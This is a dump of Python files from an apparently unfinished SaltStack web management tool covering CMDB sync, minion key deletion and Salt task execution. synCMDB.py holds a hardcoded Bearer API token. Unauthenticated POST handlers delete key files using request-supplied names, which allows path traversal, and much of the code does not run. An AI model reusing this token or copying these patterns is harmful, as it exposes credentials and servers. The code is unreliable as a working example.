self.xmlDocument.createElement('reason')\n v.appendChild(self.xmlDocument.createTextNode(value))\n \n tp.appendChild(k)\n tp.appendChild(v)\n self.root.appendChild(tp)\n with open(self.path, 'w+') as fd:\n self.xmlDocument.writexml(fd, addindent=' ', newl='\\n', encoding='utf-8')\n\n\nclass whitelist(object):\n\tdef __init__(self):\n\t\tself.filePath = 'config.d/whiteList.xml'\n\tdef getWhiteListXmlFile(self):\n\t\twith open(self.filePath) as fd:\n\t\t\tdata = fd.read()\n\t\treturn data\n\n\nif __name__ == '__main__':\n #record = handleWhiteListXmlFile().getWhiteIPList()\n #print record\n handleWhiteListXmlFile().appendIP('host', '1.1.1.1', 'test')\n"
},
{
"alpha_fraction": 0.5730336904525757,
"alphanum_fraction": 0.6292135119438171,
"avg_line_length": 16.799999237060547,
"blob_id": "bddc0dda6e16806e40b97f1c56947128c64331e7",
"content_id": "64e64f5a3ff0997e548f570367e2e2d877d81149",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 5,
"path": "/util/config.d/redis.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "redis_whiteIPList = {\n'host': 'salt-master-test.idcvdian.com',\n'port': '6397',\n'db': 0\n}\n"
},
{
"alpha_fraction": 0.6703417897224426,
"alphanum_fraction": 0.6849504113197327,
"avg_line_length": 36.020408630371094,
"blob_id": "fcb234e279fefa6523f9182ae697a0a156496027",
"content_id": "e078cf6595ad52001adfaef39cb1decc23a92e8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3918,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 98,
"path": "/util/synCMDB.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\n在CMDB中删除一台机器时,要在salt master中删除对应虚拟机的key\n这里需要在彻底删除虚拟机时,我们接口会得到消息提示\n\n对于物理机重装,则需要我们手动删除对应的KEY值\n\n下面两个函数可用于统计saltmaster上各个keys的情况(接受的、拒绝的等)\n也可以用于比对saltmaster管辖的机器和CMDB中记录的机器进行对比\n\"\"\"\n\n#http://api.o.vdian.net/servers?ip=10.1\" -H\"Authorization:Bearer 2QJvkuntJAtkHkABF0nawvUdEUM31s9f\" -H'Content-Type:application/json\n\n#curl \"http://api.o.vdian.net/servers?ip_fuzzy=10.1&page=false\" -H\"Authorization:Bearer 2QJvkuntJAtkHkABF0nawvUdEUM31s9f\" -H'Content-Type:application/json'\n#http://api.o.vdian.net/servers?ip=10.1&page=false\nimport socket\nimport urllib\nimport httplib\nimport subprocess\nimport re\nimport json\n\nclass minionIDNotExistsEXception(Exception):\n \"\"\"\n minion id不存在时引发此异常\n \"\"\"\n pass\n\n\ndef getIPListFromCMDB():\n #params = urllib.urlencode({'ip_fuzzy':'10.1.', 'page':'false'})\n headers = {'Content-Type':'application/json', 'Authorization': 'Bearer 2QJvkuntJAtkHkABF0nawvUdEUM31s9f'}\n conn = httplib.HTTPConnection('api.*.*.net')\n conn.request('GET', '/servers?ip_fuzzy=10.1&page=false',headers=headers)\n #conn.putheader('Authorization','2QJvkuntJAtkHkABF0nawvUdEUM31s9f')\n #conn.putheader('Content-Type','application/json')\n #conn.endheaders()\n response = conn.getresponse()\n data = response.read()\n conn.close()\n reg = re.compile(r'10\\.1(?:\\.[0-9]+){2}')\n iplist = reg.findall(data)\n return iplist\n\n\ndef getIPListFromSaltMaster():\n #salt-key -L | awk '/Accepted Keys:/,/Denied Keys/{if(i>1)print x;x=$0;i++}'\n #Denied Keys:\n #Unaccepted Keys:\n #Rejected Keys:\n iplist = {} \n accepted_keys = \"salt-key -L | awk '/Accepted Keys:/,/Denied Keys/{if(i>1)print x;x=$0;i++}'\"\n denied_keys = \"salt-key -L | awk '/Denied Keys/,/Unaccepted Keys/{if(i>1)print x;x=$0;i++}'\"\n unaccepted_keys = \"salt-key -L | awk '/Unaccepted Keys/,/Rejected Keys/{if(i>1)print x;x=$0;i++}'\"\n rejected_keys = \"salt-key -L | sed -n '/Rejected Keys/,$p' | sed -n '2,$p'\"\n iplist['accepted_keys']= subprocess.Popen(accepted_keys, stdout=subprocess.PIPE, shell=True).stdout.read().split()\n iplist['denied_keys']= subprocess.Popen(denied_keys, stdout=subprocess.PIPE, shell=True).stdout.read().split()\n iplist['unaccepted_keys']= subprocess.Popen(unaccepted_keys, stdout=subprocess.PIPE, shell=True).stdout.read().split()\n iplist['rejected_keys']= subprocess.Popen(rejected_keys, stdout=subprocess.PIPE, shell=True).stdout.read().split()\n return iplist\n\ndef deleteMinionKey(ipList):\n \"\"\"顶多一次删除二十条数据\n \"\"\"\n failedIPList = []\n if len(ipList) > 20:\n failedIPList = ipList\n return failedIPList\n for minionKey in ipList:\n try:\n path = os.path.join('/etc/salt/pki/master/minions', minionKey)\n if os.path.exists(path): \n os.unlink(path)\n except OSError:\n failedIPLsit.append(minionKey)\n return failedIPList\n\n\ndef dataReturnToWebPage():\n minionInSalt = getIPListFromSaltMaster()\n minionInCMDB = getIPListFromCMDB()\n ipList = []\n for ip in minionInSalt['accepted_keys']:\n if ip not in minionInCMDB:\n ipList.append(ip)\n minionInSaltNotInCMDB = deleteMinionKey(ipList)\n for ip in ipLsit:\n minionInSalt['accepted_keys'].remove(ip)\n minionNotUnderControl = []\n for ip in minionInCMDB:\n if ip not in minionInSalt['accepted_keys']:\n minionNotUnderControl.append(ip)\n minionInSalt['minionNotUnderControl'] = minionNotUnderControl\n minionInSalt['minionInSaltNotInCMDB'] = minionInSaltNotInCMDB\n \"\"\"稍后改为json格式数据\n \"\"\"\n minionInSalt = json.dumps(minionInSalt)\n return minionInSalt\n"
},
{
"alpha_fraction": 0.780339777469635,
"alphanum_fraction": 0.7851941585540771,
"avg_line_length": 21.88888931274414,
"blob_id": "fce0a561f9af9197cdc0c828a794bb80ae31c53e",
"content_id": "fdf4f426cfb10df20bbbbd829252e191f29316ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1588,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 36,
"path": "/salttask/config_d/setting.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\n\n\n这里属于配置文件,配置所有在saltmaster中定义的服务。\n配置文件在本模块加载时,载入到内存中,用于前端页面请求已经定义的推送服务类型。\n前端页面将所有的服务以下拉框的形式呈现,用户可以选择app类型。\n我们以ssh服务为例:\n当某台机器登录需要密码时,一般都是ssh没有推送分成功,这样我们可以在前段页面上选中ssh,\ntarget为指定的服务器IP地址\n点击页面上的执行button\n后端接收到指令后执行该命令,配置好机器的无密码登录\n对配置文件的修改暂不提供接口\n\"\"\"\nself_defined_app = {\n\t'yum': '配置服务器的yum源',\n\t'ssh': '配置ssh无密码登录,主要是WWW、ROOT用户的无密码登录',\n\t'hosts': '主机名配置服务'\n}\n\n\"\"\"\n这里存放所有自定义的module,标准的module可以在下列url查询:\n http://docs.saltstack.com/ref/modules/all/\n 这里也是前端提供下拉框选项,显示自定义模块,由于minion具有\n root权限所以我们在前端不开放高危险性的module,防止手滑。\n 这里我们假设self_defined_app和self_defined_modules定义的所有的服务已经可以满足我们的需求\n 并且我们可以手动在saltmaster上添加\n \n\n Jid: job id, 格式为%Y%m%d%H%M%S%f\n\"\"\"\nself_defined_modules = {\n\t#以module name作为key,module中定义的方法列表作为value\n\t#这里的module要放在_module目录下面,并且要向目的主机推送,这块暂时手动推送\n\t#\"getServerInfo\": ['func1', 'func2', 'func3']\n}\n"
},
{
"alpha_fraction": 0.6519566774368286,
"alphanum_fraction": 0.6527893543243408,
"avg_line_length": 25.795454025268555,
"blob_id": "c36bcceda566e7b4791e2dd7d762b1b1bdf0291f",
"content_id": "f22e7007ab03bee2ffb73442ca1320d25876083a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1257,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 44,
"path": "/salttask/app.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom salt import saltTask\nfrom salttask.config_d.setting import self_defined_app\nfrom salttask.config_d.setting import self_defined_modules\n\n\n\nclass saltSelfDefinedApp(object):\n\t\"\"\"\n\t一般是用来从master向minion推送某些文件\n\t\"\"\"\n\tdef __init__(appName, target):\n\t\tif appName not in self_defined_app:\n\t\t\traise ValueError, '%s does not exists' %(appName,)\n\t\tself.appName = appName\n\t\tself.target = target\n\t\tself.sync()\n def sync(self):\n \t task = salt.saltTask(self.target, 'state.sls', 'os.'+self.appName)\n \t task.start()\n \t task.wait()\n\n\n\nclass slatSelfDefinedModule(object):\n\t\"\"\"\n\t一般是用来单纯在minion上执行某些命令\n\t\"\"\"\n\tdef __init__(self, module, function,target):\n\t\tif module in self_defined_modules:\n\t\t\tif function in self_defined_modules[module]:\n\t\t\t\tself.module = module\n\t\t\t\tself.function = function\n\t\t\telse:\n\t\t\t\traise ValueError, 'module (%s) does not have function (%s)' %(self.module, self.function)\n else:\n \t raise ValueError, 'module (%s) does not exists' %(self.module,)\n\t\tself.target = target\n\t\tself.sync()\n\n\tdef sync(self): \n\t\ttask = salt.saltTask(self.target, self.module+'.'+self.function)\n\t\ttask.start()\n\t\ttask.wait()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\t\t\n\t\t\n"
},
{
"alpha_fraction": 0.5866167545318604,
"alphanum_fraction": 0.5981764793395996,
"avg_line_length": 36.45121765136719,
"blob_id": "327321b81cf4196f423e75112b7c5afa5527199f",
"content_id": "ae609cde5962e76186b8be4493fff923aea875f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6668,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 164,
"path": "/httpserver/httpServerArch.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*- \nfrom SocketServer import ForkingMixIn\nfrom BaseHTTPServer import BaseHTTPRequestHandler\nfrom BaseHTTPServer import HTTPServer\nimport json\nimport urllib\nimport logging\n\n\n\n\"\"\"\n这里多个进程会使用logger对象向同一个文件里面写入\n但是如果一次文件写入的数据量小于4096字节应该是一种原子操作,所以这里多个进程应该会安全的写入同一个文件\n我们也可以使用sockethandler,使用tcp为我们聚合日志,然后集中向文件写入,这样也就不会出现冲突等问题\n\"\"\"\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nfd = logging.FileHandler('mysalt.log')\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nfd.setFormatter(formatter)\nlogger.addHandler(fd)\n\n\"\"\"\n这里ModifiedBaseHTTPRequestHandler继承了BaseHTTPRequestHandler并且做了一点小的修改。\n原来的BseHTTPRequestHandler.parse_request()方法没有解析POST方法下的content。\n这里我们改写了这个方法,添加了一小段代码。\n self.command == 'post' and self.headers.get('content-length', None) and self.headers.get('content-type', None)\n 为真。\n 则按照content-length所指定的字节大小从tcp套接字缓冲区内读取相应字节的数据\n 并且按照content-type指定的数据格式来解析相应的数据 \n\"\"\"\n\nclass ModifiedBaseHTTPRequestHandler(BaseHTTPRequestHandler):\n global logger\n def log_warning(self, string):\n logger.warning(string) \n def log_message(self, format, *args):\n \"\"\"Log an arbitrary message.\n\n This is used by all other logging functions. Override\n it if you have specific logging wishes.\n\n The first argument, FORMAT, is a format string for the\n message to be logged. If the format string contains\n any % escapes requiring parameters, they should be\n specified as subsequent arguments (it's just like\n printf!).\n\n The client ip address and current date/time are prefixed to every\n message.\n\n \"\"\"\n logger.info('client %s - - %s %s\\n' %(self.client_address[0], format % args, str(self.body)))\n #sys.stderr.write(\"%s - - [%s] %s\\n\" %\n # (self.client_address[0],\n # self.log_date_time_string(),\n # format%args))\n def parse_request(self):\n \"\"\"Parse a request (internal).\n\n The request should be stored in self.raw_requestline; the results\n are in self.command, self.path, self.request_version and\n self.headers.\n\n Return True for success, False for failure; on failure, an\n error is sent back.\n\n \"\"\"\n self.command = None # set in case of error on the first line\n self.request_version = version = self.default_request_version\n self.close_connection = 1\n requestline = self.raw_requestline\n requestline = requestline.rstrip('\\r\\n')\n self.requestline = requestline\n words = requestline.split()\n if len(words) == 3:\n command, path, version = words\n if version[:5] != 'HTTP/':\n self.send_error(400, \"Bad request version (%r)\" % version)\n return False\n try:\n base_version_number = version.split('/', 1)[1]\n version_number = base_version_number.split(\".\")\n # RFC 2145 section 3.1 says there can be only one \".\" and\n # - major and minor numbers MUST be treated as\n # separate integers;\n # - HTTP/2.4 is a lower version than HTTP/2.13, which in\n # turn is lower than HTTP/12.3;\n # - Leading zeros MUST be ignored by recipients.\n if len(version_number) != 2:\n raise ValueError\n version_number = int(version_number[0]), int(version_number[1])\n except (ValueError, IndexError):\n self.send_error(400, \"Bad request version (%r)\" % version)\n return False\n except (ValueError, IndexError):\n self.send_error(400, \"Bad request version (%r)\" % version)\n return False\n if version_number >= (1, 1) and self.protocol_version >= \"HTTP/1.1\":\n self.close_connection = 0\n if version_number >= (2, 0):\n self.send_error(505,\n \"Invalid HTTP Version (%s)\" % base_version_number)\n return 
False\n elif len(words) == 2:\n command, path = words\n self.close_connection = 1\n if command != 'GET':\n self.send_error(400,\n \"Bad HTTP/0.9 request type (%r)\" % command)\n return False\n elif not words:\n return False\n else:\n self.send_error(400, \"Bad request syntax (%r)\" % requestline)\n return False\n self.command, self.path, self.request_version = command, path, version\n\n # Examine the headers and look for a Connection directive\n self.headers = self.MessageClass(self.rfile, 0)\n\n\n #we add some code here to get the post data if exists\n if self.command.lower() == 'post':\n content_length = int(self.headers.get('content-length', 'None'))\n content_type = self.headers.get('content-type', 'None')\n if content_length and content_type:\n self.body = self.rfile.read(content_length)\n if 'urlencoded' in content_type:\n self.body = urllib.unquote(self.body)\n elif 'json' is content_type:\n self.body = json.loads(self.body)\n else:\n self.body = None\n\n \n #content_length = self.headers.get('content-length', 'None')\n #print 'content-lenght: ', content_length\n conntype = self.headers.get('Connection', \"\")\n if conntype.lower() == 'close':\n self.close_connection = 1\n elif (conntype.lower() == 'keep-alive' and\n self.protocol_version >= \"HTTP/1.1\"):\n self.close_connection = 0\n return True\n\n \n\nclass ModifiedForkingMixin(ForkingMixIn):\n \"\"\"ForkingMixIn默认并发数最大为40\n 这里ModifiedMixFin继承ForkingMixIn,但是将并发数变为100或者其他自定义数值\n 这里暂未使用\n\n 方法搜寻原则:从左到右,广度优先\n \"\"\"\n max_children = 100\n\nclass HttpServerArch(ForkingMixIn, HTTPServer):\n pass\n\n\n\nclass HttpRequestHandlerArch(ModifiedBaseHTTPRequestHandler):\n pass\n"
},
{
"alpha_fraction": 0.6832695007324219,
"alphanum_fraction": 0.687100887298584,
"avg_line_length": 21.757282257080078,
"blob_id": "23a673e25c173aeff936ead727ce62e261a1d288",
"content_id": "97bd160b345245b83b7ee6ec5cf845b5511971c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2765,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 103,
"path": "/salttask/salt.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\n\n\n\ntry:\n\timport MySQLdb\nexcept ImportError:\n\t__hasMySQLdb__ = True\n__hasMySQLdb__ = False\n\n\n\n\"\"\"\n(1)未返回主机列表(原先的target list与所有返回的list--可能是成功或者失败,对比出未返回的)\n 未返回的结果,先检查主机存活与否,若存活,则再检查连接性,若连接着,二次执行\n 通过两个函数来判断\n(2)执行出错主机列表(直接通过success字段判断)\n(3)成功执行主机列表(直接通过success字段判断) \n---->总共有这三种情况\n\"\"\"\n\ndef checktarget(value):\n\t\"\"\"\n\t 用来解析target的合法性,这里算作一个命令执行的控制口\n\t 定义salt组等其他target模式\n\t 以后也可以扩展,生成target的可执行命令的配置白名单\n\t\"\"\"\n\treturn True\n\n\nclass target(object):\n\t\"\"\"\n\t这是一个descriptor,访问控制\n\t\"\"\"\n\tdef __get__(self, instance, owner):\n\t\tif hasattr(insatnce, '_target'):\n\t\t\tif not instance._target:\n\t\t\t\traise AttributeError, \"salttarget is None\"\n\t\t\treturn instance._target\n\t\traise AttributeError, \"salttarget is not set\"\n\tdef __set__(self, instance, value):\n\t\tif not checktarget(value):\n\t\t\tinstance._target = None\n\t\t raise AttributeError, 'salttarget is unvalid'\n\t\tinstance._target = value\n\t\t\n\n\n\nclass saltTask(object):\n\t\"\"\"\n\t定义一次salt的task\n\t\"\"\"\n\tsalttarget = target()\n\tdef __init__(self, salttarget, saltModuleFunction):\n\t\t#self.saltcommand = saltcommand\n\t\tself.salttarget = salttarget\n\t\tself.saltModuleFunction = saltModuleFunction\n\t\tself.fun_args = args\n\t\tself.fun_kargs = kargs\n\n\tdef start(self):\n\t\ttry:\n\t\t\tself.taskpid = os.fork()\n\t\t\tif pid == 0:\n\t\t\t\tos.execl('/usr/bin/salt', 'salt', self.salttarget, self.saltModuleFunction)\n\t\texcept OSError, e:\n\t\t\tself.ret = \"failed\"\n\n\tdef wait(self):\n\t\tif hasattr(self, 'ret'):\n\t\t\tself.storeTaskInfo(self.ret, self.jobid, self.target)\n\t\t\treturn \n\t\tpid , status = os.waitpid(self.taskpid, 0)\n\t\tself.ret = \"success\"\n\t\tself.storeTaskInfo(self.ret, self.jobid, self.target)\n\n\tdef storeTaskInfo(self,ret, jobid):\n\t\twith handlerDB(dbname, hostname, username, password) as db:\n\t\t\tdb.execute(\"insert into table_name values (%s, %s)\" %(ret, jobid))\n\t\treturn self.jobid\n\n\t\t\t\n\nclass handlerDB(object):\n\t\"\"\"\n\t实现数据库的操作\n\t\"\"\"\n\tdef __init__(self, dbname, hostname, username, password):\n\t\tif not __hasMySQLdb__:\n\t\t\traise ImportError, 'No MySQLdb module!'\n\t\tself.dbname = dbname\n\t\tself.hostname = hostname\n\t\tself.username = username\n\t\tself.password = password\n\tdef __enter__(self):\n\t\tconn = MySQLdb.connect(db=self.dbname, host=self.hostname, user=self.username, passwd=self.password)\n\t\tcur = conn.cursor()\n\t\treturn cur\n\tdef __exit__(self, para1, para2, para3):\n\t\tcur.close()\n\t\tconn.close()\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6908619403839111,
"alphanum_fraction": 0.691510021686554,
"avg_line_length": 23.492063522338867,
"blob_id": "d966d5a72e16cf023f2f5027162a6ae787dbbeed",
"content_id": "7cc789d1414eeba18bd2875b28f9e82038089d4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1555,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 63,
"path": "/mainLogServer.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\nimport socket\nimport logging\nimport threading\n\nunixDomainSocket = '/var/logUnixDomainSocket'\n\nlogserver = None\n\ndef createServerLog(logFilePath):\n\tglobal logserver\n\tif not logserver:\n\t\tlogserver = __serverLog(logFilePath)\n\treturn logserver\n\n\n\"\"\"\nlogging是线程安全的\n\"\"\"\n\n\n\nclass __serverLog(object):\n def __init__(self,logFilePath):\n\t\tself.logFilePath = logFilePath\n\t\tself.logger = logging.getLogger()\n def start(self):\n\t\twhile True:\n\t\t\tconn, addr = conn.accept()\n\n def createUnixSocket(self):\n \tif os.path.exists(unixDomainSocket):\n \t\ttry:\n \t\t\tos.unlink(logFilePath)\n \t\texcept OSError:\n \t\t\traise OSError, 'delete '+unixDomainSocket+ ' error!'\n \telse:\n \t\tself.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n \t\tself.sock.bind(unixDomainSocket)\n \t\tself.sock.listen()\n\n\n\n\nclass clientLog(object):\n\tdef __init__(obejct):\n\t\tif not logserver:\n\t\t\traise ValueError, 'log server does not exists!'\n\t\tself.logger = logging.getLoger()\n\t\tself.connectionToUnixDoaminServer()\n\tdef connectionToUnixDoaminServer(self):\n\t\tif logserver:\n\t\t\tself.cli = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n\t\t\tself.cli.connect(unixDomainSocket)\n\t\telse:\n\t\t\traise ValueError, 'log server does not exists!'\n\tdef loggerBindSocketfd(self):\n\t\tself.logger = logging.getLoger()\n\t\tself.logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n self.logger.setFormatter(formatter)\n self.logger.addHandler(fd)\n"
},
{
"alpha_fraction": 0.5782263875007629,
"alphanum_fraction": 0.5868781805038452,
"avg_line_length": 30.522727966308594,
"blob_id": "411641a1096e0316362309e30d8ad34ab016aa64",
"content_id": "52febd6da883a5a5c3d91203ce983c32465bccda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3038,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 88,
"path": "/main.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*- \nimport os\nimport sys\nimport logging\npath = os.getcwd()\nsys.path.append(path) \nfrom httpserver.httpServerArch import HttpServerArch\nfrom httpserver.httpServerArch import HttpRequestHandlerArch\nfrom util.synCMDB import deleteMinionKey \nfrom util.synCMDB import dataReturnToWebPage\nfrom salttask.app import saltSelfDefinedApp\nfrom salttask.app import slatSelfDefinedModule\nimport httpserver\n\n\nclass myHttpRequestHandler(HttpRequestHandlerArch):\n def sendHeadersAndContent(self):\n\tself.send_response(200, 'ok')\n self.send_header('Connection', 'close')\n if self.body:\n self.send_header(\"Content-Type\", 'application/json')\n self.end_headers()\n if self.body:\n self.wfile.write(self.body)\n def do_GET(self):\n \tself.body = {}\n \tif self.path.startswith('/saltinfo'):\n \t\tself.body = dataReturnToWebPage()\n \t\"\"\"\n \tparams = self.path.split('?')[1].split('&')\n \tfor item in params:\n \t\ttmp = item.split('=')\n \t\tself.body[tmp[0]] = tmp[1]\n \t\"\"\"\n \tself.sendHeadersAndContent()\n \t\n\n \"\"\"\n to_do_list:\n 自定义salt job id\n 支持module function params\n \"\"\"\n def do_POST(self):\n if self.path.startswith('/totaldelete'):\n \"\"\"\n 这里post的content字段应该是一系列IP地址\n IP地址应该是空格或者回车分割\n 这里主要作用是,删除不必要的minion key,虚拟机可以自动删除\n 但是重装的物理机需要在页面上手动填写物理机IP地址\n \"\"\"\n ipList = []\n for item in self.body.split():\n \tif item:\n ipList.append(item)\n #self.sendHeadersAndContent()\n #print ipList\n failed = deleteMinionKey(ipList) \n self.sendHeadersAndContent()\n #httpserver.httpServerArch.logger.info(\"minuons_key: {0} already deleted..\".format(list(ipList))) \n self.log_warning(\"minuons_key: {0} should delete...,remain: {1}\".format(list(ipList), list(failed)))\n \n elif self.path.startswith('/executetask'):\n \"\"\"\n 这里主要处理页面上提交过来的salt任务\n 这里把任务分为两类(以后分类将会更多)\n \t (1)基础任务和已经定义的任务\n \t (2)自定义module\n \"\"\"\n target = {}\n for item in self.body.split():\n \t tmp = item.split('=')\n \t self.body[tmp[0]] = tmp[1]\n self.sendHeadersAndContent()\n\n if self.body.get('appname', None):\n saltSelfDefinedApp(self.get('appname'), self.get('target'))\n else:\n #module, function,target, *args, **kargs\n saltSelfDefinedModule(self.body.get('module'), self.body.get('function'), self.body.get('target'))\n\n\n\n\ndef main():\n\thttpd = HttpServerArch(('127.0.0.1', 8080), myHttpRequestHandler)\n \thttpd.serve_forever()\n\nmain()\n"
}
] | 10 |
epfl-mobots/find | https://github.com/epfl-mobots/find | ad435541004b8f26c66f941df3e6e63b0442a339 | f7ba7491268501d495db280cdcb4df739c316340 | cd2f751adb60f0c8ce020302805faeafdd58c34f | refs/heads/main | 2023-04-18T02:23:53.398375 | 2023-03-29T21:06:22 | 2023-03-29T21:06:22 | 337,859,711 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6171384453773499,
"alphanum_fraction": 0.6288137435913086,
"avg_line_length": 39.71300506591797,
"blob_id": "744a3fc3038afa8f962cee15ee7a93fcf4b90af9",
"content_id": "909fb7a5c9b2a92cdfbc7773c6eb78759a9a4146",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9079,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 223,
"path": "/find/models/tf_models.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nfrom find.models.tf_losses import *\nimport find.models.tf_activations as tfa\n\n\ndef LSTM(input_shape, output_shape, args):\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.LSTM(128, return_sequences=False,\n input_shape=input_shape, activation='sigmoid'))\n model.add(tf.keras.layers.Dense(80, activation='sigmoid'))\n model.add(tf.keras.layers.Dense(50, activation='sigmoid'))\n model.add(tf.keras.layers.Dense(20, activation='tanh'))\n model.add(tf.keras.layers.Dense(output_shape, activation=None))\n model.compile(\n loss='mse',\n optimizer=optimizer,\n metrics=['mae']\n )\n return model\n\n\ndef PLSTM(input_shape, output_shape, args):\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.LSTM(32, return_sequences=False,\n input_shape=input_shape, activation='sigmoid'))\n model.add(tf.keras.layers.Dense(25, activation='sigmoid'))\n model.add(tf.keras.layers.Dense(16, activation='sigmoid'))\n model.add(tf.keras.layers.Dense(10, activation='tanh'))\n model.add(tf.keras.layers.Dense(output_shape * 2, activation=None))\n model.compile(\n loss=gaussian_nll,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n\n\ndef PLSTM_SHALLOW(input_shape, output_shape, args):\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.LSTM(128, return_sequences=False,\n input_shape=input_shape, activation='tanh'))\n model.add(tf.keras.layers.Dense(50, activation='tanh'))\n model.add(tf.keras.layers.Dense(20, activation='tanh'))\n model.add(tf.keras.layers.Dense(output_shape * 2, activation=None))\n model.compile(\n loss=gaussian_nll,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n\n\ndef PLSTM_2L(input_shape, output_shape, args):\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.LSTM(128, return_sequences=False,\n input_shape=input_shape, activation='relu'))\n model.add(tf.keras.layers.Dense(80, activation='relu'))\n model.add(tf.keras.layers.Dense(50, activation='tanh'))\n model.add(tf.keras.layers.Reshape((1, 50)))\n model.add(tf.keras.layers.LSTM(128, return_sequences=False,\n activation='relu'))\n model.add(tf.keras.layers.Dense(80, activation='relu'))\n model.add(tf.keras.layers.Dense(20, activation='tanh'))\n model.add(tf.keras.layers.Dense(output_shape * 2, activation=None))\n model.compile(\n loss=gaussian_nll,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n\n\ndef PLSTM_MULT_PREDS(input_shape, output_shape, args):\n assert args.prediction_steps > 1\n\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.LSTM(128, return_sequences=False,\n input_shape=input_shape, activation='tanh'))\n model.add(tf.keras.layers.Dense(80, activation='tanh'))\n model.add(tf.keras.layers.Dense(50, activation='tanh'))\n model.add(tf.keras.layers.Dense(80, activation='tanh'))\n model.add(tf.keras.layers.Dense(20, activation='tanh'))\n model.add(tf.keras.layers.Dense(\n output_shape * args.prediction_steps * 2, activation=None))\n model.add(tf.keras.layers.Lambda(\n lambda x: tf.reshape(x, shape=(-1, 1, args.prediction_steps, output_shape * 2))))\n model.compile(\n loss=multi_dim_gaussian_nll,\n optimizer=optimizer,\n )\n return model\n\n\ndef PFW(input_shape, 
output_shape, args):\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Flatten(input_shape=input_shape))\n model.add(tf.keras.layers.Dense(100, activation=gaussian))\n model.add(tf.keras.layers.Dense(80, activation='tanh'))\n model.add(tf.keras.layers.Dense(50, activation='tanh'))\n model.add(tf.keras.layers.Dense(80, activation='tanh'))\n model.add(tf.keras.layers.Dense(20, activation='tanh'))\n model.add(tf.keras.layers.Dense(output_shape * 2, activation=None))\n loss = gaussian_nll\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model.compile(loss=loss,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n\n\ndef LCONV(input_shape, output_shape, args):\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.LSTM(128, return_sequences=True,\n input_shape=input_shape, activation='tanh'))\n model.add(tf.keras.layers.Conv1D(\n 128, kernel_size=3, input_shape=(100, 1), padding='causal', activation='relu'))\n model.add(tf.keras.layers.MaxPool1D(pool_size=2))\n model.add(tf.keras.layers.Conv1D(\n 64, kernel_size=2, padding='causal', activation='relu'))\n model.add(tf.keras.layers.MaxPool1D(pool_size=2))\n model.add(tf.keras.layers.Conv1D(\n 32, kernel_size=1, padding='causal', activation='relu'))\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(30, activation='tanh'))\n model.add(tf.keras.layers.Dense(output_shape * 2, activation=None))\n model.compile(\n loss=gaussian_nll,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n\n\ndef PLSTM_model_builder(input_shape, output_shape, args):\n assert 